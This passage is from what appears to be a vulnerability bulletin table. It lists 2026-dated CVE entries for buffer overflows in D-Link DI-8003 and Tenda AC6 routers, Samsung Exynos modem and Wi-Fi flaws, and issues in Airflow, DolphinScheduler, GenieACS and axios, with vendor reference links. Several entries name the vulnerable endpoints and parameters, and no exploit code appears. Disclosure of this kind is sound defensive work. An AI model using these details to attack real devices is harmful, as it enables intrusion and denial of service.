<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of multiple parameters in the /url_rule.asp endpoint.=
An attacker can exploit this vulnerability by sending a crafted HTTP GET r= equest with parameters name, en, ips, u, time, act, rpri, and log.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50661" target=3D= "_blank" rel=3D"noopener">CVE-2025-50661</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the name parameter in the /url_group.asp endpoint.= </td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50662" target=3D= "_blank" rel=3D"noopener">CVE-2025-50662</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the name parameter in the /usb_paswd.asp endpoint.= </td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50663" target=3D= "_blank" rel=3D"noopener">CVE-2025-50663</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of parameters in the /user_group.asp endpoint. The at= tacker can exploit this vulnerability by sending a crafted HTTP GET request=
with parameters name, mem, pri, and attr.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50664" target=3D= "_blank" rel=3D"noopener">CVE-2025-50664</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of input parameters in the /web_keyword.asp endpoint.=
An attacker can exploit this vulnerability by sending a crafted HTTP GET r= equest via the name, en, time, mem_gb2312, and mem_utf8 parameters.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50665" target=3D= "_blank" rel=3D"noopener">CVE-2025-50665</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of multiple parameters in the /web_post.asp endpoint.=
An attacker can exploit this vulnerability by sending a crafted HTTP GET r= equest in parameters such as name, en, user_id, log, and time.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50666" target=3D= "_blank" rel=3D"noopener">CVE-2025-50666</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the iface parameter in the /wan_line_detection.asp=
endpoint.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50667" target=3D= "_blank" rel=3D"noopener">CVE-2025-50667</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the s parameter in the /web_list_opt.asp endpoint.= </td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50668" target=3D= "_blank" rel=3D"noopener">CVE-2025-50668</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 and=
DI-8003G 19.12.10A1 due to improper handling of the wan_ping parameter in = the /wan_ping.asp endpoint.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50669" target=3D= "_blank" rel=3D"noopener">CVE-2025-50669</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of parameters in the /xwgl_bwr.asp endpoint. An attac= ker can exploit this vulnerability by sending a crafted HTTP GET request in=
the name, qq, and time parameters.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50670" target=3D= "_blank" rel=3D"noopener">CVE-2025-50670</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of parameters in the /xwgl_ref.asp endpoint. An attac= ker can exploit this vulnerability by sending a crafted HTTP GET request wi=
th excessively long strings in parameters name, en, user_id, shibie_name, t= ime, act, log, and rpri.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50671" target=3D= "_blank" rel=3D"noopener">CVE-2025-50671</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of parameters in the /yyxz_dlink.asp endpoint.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50672" target=3D= "_blank" rel=3D"noopener">CVE-2025-50672</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003</td>
<td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due=
to improper handling of the http_lanport parameter in the /webgl.asp endpo= int.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-50673" target=3D= "_blank" rel=3D"noopener">CVE-2025-50673</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Tendacn[.]com -- AC6 WiFi Router</td>
<td>Tenda AC6 15.03.05.16_multi is vulnerable to Buffer Overflow in the for= mSetCfm function via the funcname, funcpara1, and funcpara2 parameters.</td=

<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-52221" target=3D= "_blank" rel=3D"noopener">CVE-2025-52221</a></td>

<a href=3D"https://github.com/faqiadegege/IoTVuln/blob/main/tendaAc6_formSe= tCfm_funcname_overflow/detail.md" target=3D"_blank" rel=3D"noopener">https:= //github.com/faqiadegege/IoTVuln/blob/main/tendaAc6_formSetCfm_funcname_ove= rflow/detail.md</a><br><a href=3D"https://github.com/xiaotea/iot-vulnerabil= ity-collection/blob/main/README.md" target=3D"_blank" rel=3D"noopener">http= s://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a>= <br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">D-Link[.]com -- D-Link DI-8003=C2=A0</td> <td>D-Link DI-8003 v16.07.26A1, DI-8500 v16.07.26A1; DI-8003G v17.12.21A1, = DI-8200G v17.12.20A1, DI-8200 v16.07.26A1, DI-8400 v16.07.26A1, DI-8004w v1= 6.07.26A1, DI-8100 v16.07.26A1, and DI-8100G v17.12.20A1 were discovered to=
contain a buffer overflow via the rd_en, rd_auth, rd_acct, http_hadmin, ht= tp_hadminpwd, rd_key, and rd_ip parameters in the radius_asp function. This=
vulnerability allows attackers to cause a Denial of Service (DoS) via a cr= afted request.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-52222" target=3D= "_blank" rel=3D"noopener">CVE-2025-52222</a></td>

<a href=3D"https://www.dlink.com/en/security-bulletin/" target=3D"_blank" r= el=3D"noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href= =3D"https://github.com/xiaotea/iot-vulnerability-collection/blob/main/READM= E.md" target=3D"_blank" rel=3D"noopener">https://github.com/xiaotea/iot-vul= nerability-collection/blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor=
and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920=
, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads t=
o a buffer overflow via a certain ioctl message, issue 1 of 2.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-52908" target=3D= "_blank" rel=3D"noopener">CVE-2025-52908</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-52908/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-52908/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor=
and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920=
, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads t=
o a buffer overflow via a certain ioctl message, issue 2 of 2.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-52909" target=3D= "_blank" rel=3D"noopener">CVE-2025-52909</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-52909/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-52909/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in NAS in Samsung Mobile Processor, Wearable Pr= ocessor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380=
, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, = and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a = Denial of Service.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-54324" target=3D= "_blank" rel=3D"noopener">CVE-2025-54324</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-54324/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-54324/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in SMS in Samsung Mobile Processor, Wearable Pr= ocessor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380=
, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, = and Modem 5400. A Stack-based Buffer Overflow occurs while parsing SMS RP-D= ATA messages.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-54328" target=3D= "_blank" rel=3D"noopener">CVE-2025-54328</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-54328/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-54328/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor=
amd Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580=
, W920, W930, and W1000. Improper synchronization on a global variable lead=
s to a double free. An attacker can trigger a race condition by invoking an=
ioctl function concurrently from multiple threads.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-54601" target=3D= "_blank" rel=3D"noopener">CVE-2025-54601</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-54601/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-54601/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor=
and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580=
, W920, W930, and W1000. Improper synchronization on a global variable lead=
s to a use-after-free. An attacker can trigger a race condition by invoking=
an ioctl function concurrently from multiple threads.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-54602" target=3D= "_blank" rel=3D"noopener">CVE-2025-54602</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-54602/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-54602/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--GenieACS</td>
<td>In GenieACS 1.2.13, an unauthenticated access vulnerability exists in t=
he NBI API endpoint.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-56015" target=3D= "_blank" rel=3D"noopener">CVE-2025-56015</a></td>

<a href=3D"https://github.com/genieacs/genieacs/" target=3D"_blank" rel=3D"= noopener">https://github.com/genieacs/genieacs/</a><br><a href=3D"https://g= ithub.com/e1st/CVE-2025-56015" target=3D"_blank" rel=3D"noopener">https://g= ithub.com/e1st/CVE-2025-56015</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Airflow</td=

<td>When user logged out, the JWT token the user had authtenticated with wa=
s not invalidated, which could lead to reuse of that token in case it was i= ntercepted. In Airflow 3.2 we implemented the mechanism that implements tok=
en invalidation at logout. Users who are concerned about the logout scenari=
o and possibility of intercepting the tokens, should upgrade to Airflow 3.2=
+ Users are recommended to upgrade to version 3.2.0, which fixes this issue= .</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57735" target=3D= "_blank" rel=3D"noopener">CVE-2025-57735</a></td>

<a href=3D"https://github.com/apache/airflow/pull/61339" target=3D"_blank" = rel=3D"noopener">https://github.com/apache/airflow/pull/61339</a><br><a hre= f=3D"https://github.com/apache/airflow/pull/56633" target=3D"_blank" rel=3D= "noopener">https://github.com/apache/airflow/pull/56633</a><br><a href=3D"h= ttps://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98" target=3D"= _blank" rel=3D"noopener">https://lists.apache.org/thread/ovn8mpd8zkc604hojt= 7x3wsw3kc60x98</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in Samsung Mobile Processor, Wearable Processor=
, and Modem (Exynos 980, 850, 990, 1080, 2100, 1280, 2200, 1330, 1380, 1480=
, 2400, 1580, 2500, 1680, 9110, W920, W930, W1000, Modem 5123, Modem 5300, = Modem 5400, and Modem 5410). The absence of proper input validation leads t=
o a Denial of Service.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57834" target=3D= "_blank" rel=3D"noopener">CVE-2025-57834</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-54328/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-54328/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in RRC in Samsung Mobile Processor, Wearable Pr= ocessor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380=
, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, = and Modem 5400. Improper memory initialization results in an illegal memory=
access, causing a system crash via a malformed RRCReconfiguration message.= </td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-57835" target=3D= "_blank" rel=3D"noopener">CVE-2025-57835</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-57835/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-57835/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in L2 in Samsung Mobile Processor, Wearable Pro= cessor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380,=
1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, a=
nd Modem 5400. Incorrect handling of LTE MAC packets containing many MAC Co= ntrol Elements (CEs) leads to baseband crashes.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-58349" target=3D= "_blank" rel=3D"noopener">CVE-2025-58349</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-58349/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-58349/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in USIM in Samsung Mobile Processor, Wearable P= rocessor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 138=
0, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300,=
and Modem 5400. Improper handling of SIM card proactive commands leads to =
a Denial of Service.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-59440" target=3D= "_blank" rel=3D"noopener">CVE-2025-59440</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-59440/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-59440/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>An open redirect in Ascertia SigningHub User v10.0 allows attackers to = redirect users to a malicious site via a crafted URL.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-61166" target=3D= "_blank" rel=3D"noopener">CVE-2025-61166</a></td>

<a href=3D"https://linkedin.com/in/thakur-nikhil" target=3D"_blank" rel=3D"= noopener">https://linkedin.com/in/thakur-nikhil</a><br><a href=3D"https://m= edium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166-bf5d708c= d241" target=3D"_blank" rel=3D"noopener">https://medium.com/@rajput.thakur/= malicious-open-redirection-cve-2025-61166-bf5d708cd241</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache DolphinSche= duler</td>
<td>An Exposure of Sensitive Information to an Unauthorized Actor vulnerabi= lity exists in Apache DolphinScheduler. This vulnerability may allow unauth= orized actors to access sensitive information, including database credentia= ls. This issue affects Apache DolphinScheduler versions 3.1.*. Users are re= commended to upgrade to: * version =E2=89=A5 3.2.0 if using 3.1.x As a temp= orary workaround, users who cannot upgrade immediately may restrict the exp= osed management endpoints by setting the following environment variable: ``=
` MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=3Dhealth,metrics,prometheus ```=
Alternatively, add the following configuration to the application.yaml fil=
e: ``` management: =C2=A0 =C2=A0endpoints: =C2=A0 =C2=A0 =C2=A0web: =C2=A0 = =C2=A0 =C2=A0 =C2=A0 exposure: =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 include: = health,metrics,prometheus ``` This issue has been reported as CVE-2023-4879=
6: https://cveprocess.apache.org/cve5/CVE-2023-48796</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-62188" target=3D= "_blank" rel=3D"noopener">CVE-2025-62188</a></td>

<a href=3D"https://lists.apache.org/thread/ffrmkcwgr2lcz0f5nnnyswhpn3fytsvo=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/ffrmkc= wgr2lcz0f5nnnyswhpn3fytsvo</a><br><a href=3D"https://www.cve.org/CVERecord?= id=3DCVE-2023-48796" target=3D"_blank" rel=3D"noopener">https://www.cve.org= /CVERecord?id=3DCVE-2023-48796</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">axios--axios</td>
<td>Axios is a promise based HTTP client for the browser and Node.js. Prior=
to 1.15.0, Axios does not correctly handle hostname normalization when che= cking NO_PROXY rules. Requests to loopback addresses like localhost. (with =
a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go throu=
gh the configured proxy. This goes against what developers expect and lets = attackers force requests through a proxy, even if NO_PROXY is set up to pro= tect loopback or internal services. This issue leads to the possibility of = proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive=
loopback or internal services despite the configured protections. This vul= nerability is fixed in 1.15.0.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-62718" target=3D= "_blank" rel=3D"noopener">CVE-2025-62718</a></td>

